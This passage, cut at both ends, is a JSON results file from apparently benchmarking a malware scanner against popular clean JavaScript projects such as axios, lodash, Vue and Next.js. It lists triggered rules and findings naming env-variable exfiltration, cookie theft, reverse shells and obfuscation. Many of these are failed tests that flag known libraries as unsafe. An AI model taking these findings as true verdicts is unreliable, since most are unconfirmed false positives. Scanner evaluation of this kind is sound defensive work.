"sourceUrl": "https://github.com/axios/axios", + "immutableRef": "3ebc76240c835a07fc6af23cb10d41579371a08f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "BEAVERTAIL_EXFIL", + "EXFIL_COOKIE", + "DATA_EXFILTRATION", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "docs/scripts/process-sponsors.js", + "line": 120, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "examples/post/index.html", + "line": 29, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": "lib/helpers/cookies.js", + "line": 5, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "sandbox/client.js", + "line": 20, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/browser/defaults.browser.test.js", + "line": 200, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/browser/formdata.browser.test.js", + "line": 85, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/browser/headers.browser.test.js", + "line": 170, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/browser/interceptors.browser.test.js", + "line": 696, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/browser/transform.browser.test.js", + "line": 90, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/module/cjs/tests/helpers/cjs-typing.ts", + "line": 83, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/module/esm/tests/helpers/esm-index.ts", + "line": 105, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/bun/tests/fetch.smoke.test.ts", + "line": 64, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/bun/tests/formData.smoke.test.ts", + "line": 72, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/bun/tests/headers.smoke.test.ts", + "line": 48, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/bun/tests/http.smoke.test.ts", + "line": 80, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/basic.smoke.test.cjs", + "line": 100, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/fetch.smoke.test.cjs", + "line": 80, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/files.smoke.test.cjs", + "line": 57, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/formData.smoke.test.cjs", + "line": 66, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/headers.smoke.test.cjs", + "line": 101, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/progress.smoke.test.cjs", + "line": 65, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/cjs/tests/urlencode.smoke.test.cjs", + "line": 93, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/deno/tests/fetch.smoke.test.ts", + "line": 99, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/deno/tests/headers.smoke.test.ts", + "line": 61, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/basic.smoke.test.js", + "line": 100, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/fetch.smoke.test.js", + "line": 77, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/files.smoke.test.js", + "line": 57, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/formData.smoke.test.js", + "line": 63, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/headers.smoke.test.js", + "line": 101, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/progress.smoke.test.js", + "line": 65, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/smoke/esm/tests/urlencode.smoke.test.js", + "line": 93, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/unit/adapters/fetch.test.js", + "line": 369, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "tests/unit/adapters/http.test.js", + "line": 1517, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "high", + "confidence": "high", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "lib/axios.js", + "line": null, + "description": "Data exfiltration patterns detected: Form Data Transmission" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "lib/helpers/shouldBypassProxy.js", + "line": 21, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + } + ], + "filesScanned": 200, + "filesSkipped": 254, + "treeTruncated": false, + "durationMs": 3550, + "error": "" + }, + { + "sampleId": "reference-lodash", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/lodash/lodash", + "immutableRef": "a666ba591064c8011988275790ad7d625279f09c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_HEX_STRINGS", + "EXFIL_COOKIE", + "OBF_BASE64_HEAVY", + "OBF_EVAL", + "OBF_NEW_FUNCTION", + "OBFUSCATED_CODE", + "NETWORK_COMMUNICATION", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "dist/lodash.js", + "line": 226, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "dist/lodash.min.js", + "line": 16, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "lodash.js", + "line": 226, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "test/test.js", + "line": 116, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 5997, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 26455, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 489, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 15309, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 31165, + "description": "Extremely long line detected (42,848 characters). Malicious code may be hidden far to the right. Affected: Line 31165 (42,848 chars)" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "vendor/json-js/json2.js", + "line": 504, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "vendor/underscore/underscore-min.js", + "line": 5, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "vendor/underscore/underscore-min.js", + "line": 5, + "description": "Extremely long line detected (16,194 characters). Malicious code may be hidden far to the right. Affected: Line 5 (16,194 chars)" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "vendor/underscore/underscore.js", + "line": 1531, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "dist/lodash.js", + "line": 14567, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "lodash.js", + "line": 14567, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 3348, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 63, + "filesSkipped": 97, + "treeTruncated": false, + "durationMs": 11540, + "error": "" + }, + { + "sampleId": "reference-chalk", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/chalk/chalk", + "immutableRef": "aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"mocha\": matcha" + } + ], + "filesScanned": 21, + "filesSkipped": 13, + "treeTruncated": false, + "durationMs": 2741, + "error": "" + }, + { + "sampleId": "reference-uuid", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/uuidjs/uuid", + "immutableRef": "ea83515d6a4de13a8f9d253fe772752c9dd7bbbe", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_FILE_ACCESS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "scripts/build.sh", + "line": 23, + "description": "Suspicious file access detected: Destructive File Deletion" + } + ], + "filesScanned": 100, + "filesSkipped": 34, + "treeTruncated": false, + "durationMs": 3556, + "error": "" + }, + { + "sampleId": "reference-node-fetch", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/node-fetch/node-fetch", + "immutableRef": "8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 27, + "filesSkipped": 26, + "treeTruncated": false, + "durationMs": 2232, + "error": "" + }, + { + "sampleId": "reference-react", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/facebook/react", + "immutableRef": "c0c39a6b3907eaab35f43074949e2957a2a734c1", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.25, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "compiler/apps/playground/components/Icons/IconGitHub.tsx", + "line": 20, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + } + ], + "filesScanned": 200, + "filesSkipped": 7070, + "treeTruncated": false, + "durationMs": 5341, + "error": "" + }, + { + "sampleId": "reference-vue", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vuejs/core", + "immutableRef": "9e03beb6b4c85a9d5b49b731c08263aa648e2a2a", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.75, + "safeToClone": false, + "rulesTriggered": [ + "OBF_NEW_FUNCTION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "packages/compiler-core/src/options.ts", + "line": 312, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "packages/compiler-core/src/validateExpression.ts", + "line": null, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "packages/compiler-dom/src/transforms/stringifyStatic.ts", + "line": 405, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + } + ], + "filesScanned": 200, + "filesSkipped": 503, + "treeTruncated": false, + "durationMs": 3165, + "error": "" + }, + { + "sampleId": "reference-svelte", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/sveltejs/svelte", + "immutableRef": "b4d1583ae20f3869a88a731d9a265c546c099f66", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 8765, + "treeTruncated": false, + "durationMs": 4396, + "error": "" + }, + { + "sampleId": "reference-vite", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vitejs/vite", + "immutableRef": "fef682d3f067d534a559faf6fd9baedda2e9f8f1", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 2513, + "treeTruncated": false, + "durationMs": 3870, + "error": "" + }, + { + "sampleId": "reference-next", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vercel/next.js", + "immutableRef": "93249ee06d6e0c105b1278412768c8e0816d9936", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "BEAVERTAIL_EXFIL", + "HARDCODED_AWS_KEY", + "OBF_BASE64_HEAVY", + "OBF_EVAL", + "OBFUSCATED_CODE", + "EXFIL_COOKIE", + "REVERSE_SHELL", + "SUSPICIOUS_FILE_ACCESS", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 1, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 8, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 9, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 1, + "description": "Extremely long line detected (340,182 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (127,929 chars, contains suspicious code), Line 7 (135,823 chars, contains suspicious code), Line 8 (284,175 chars, contains suspicious code)" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 16, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 19, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "Extremely long line detected (283,655 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (266,231 chars, contains suspicious code), Line 15 (120,797 chars, contains suspicious code), Line 16 (283,655 chars, contains suspicious code)" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 16, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 19, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "Extremely long line detected (283,655 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (266,231 chars, contains suspicious code), Line 15 (120,797 chars, contains suspicious code), Line 16 (283,655 chars, contains suspicious code)" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": ".github/actions/next-repo-actions/dist/wrong-issue-template/index.js", + "line": 1, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": ".github/actions/next-repo-actions/dist/wrong-issue-template/index.js", + "line": 2, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/next-repo-actions/dist/wrong-issue-template/index.js", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/next-repo-actions/dist/wrong-issue-template/index.js", + "line": 1, + "description": "Extremely long line detected (284,026 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (283,862 chars, contains suspicious code), Line 2 (283,305 chars, contains suspicious code), Line 3 (116,956 chars, contains suspicious code)" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "REVERSE_SHELL", + "file": ".github/actions/next-stats-action/src/run/collect-stats.js", + "line": 25, + "description": "Socket-based reverse shell connection — creates a TCP connection back to attacker" + }, + { + "severity": 